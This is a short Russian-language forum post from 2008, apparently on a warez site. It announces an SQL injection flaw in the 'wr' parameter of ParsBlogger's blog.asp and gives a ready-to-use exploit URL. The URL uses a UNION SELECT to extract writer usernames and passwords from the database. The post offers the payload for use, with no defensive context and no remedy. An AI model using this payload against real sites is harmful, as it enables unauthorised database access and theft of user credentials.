SQL-инъекция в ParsBlogger

Страница: 1

Сообщений 1 страница 1 из 1

Поделиться12008-11-28 12:51:42

Автор: Giorgi
Администратор
Зарегистрирован: 2008-10-27
Приглашений: 0
Сообщений: 220
Уважение: +1
Позитив: +5
Провел на форуме:
3 дня 0 часов
Последний визит:
2023-05-03 13:12:03

Программа: ParsBlogger

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «wr» сценарием blog.asp. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.

Эксплоит:

site.ir/blog.asp?wr=-5+union+all+select+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13+from+writer--

Страница: 1

Warez Portal

Меню навигации

Пользовательские ссылки

Информация о пользователе

SQL-инъекция в ParsBlogger

Сообщений 1 страница 1 из 1

Поделиться12008-11-28 12:51:42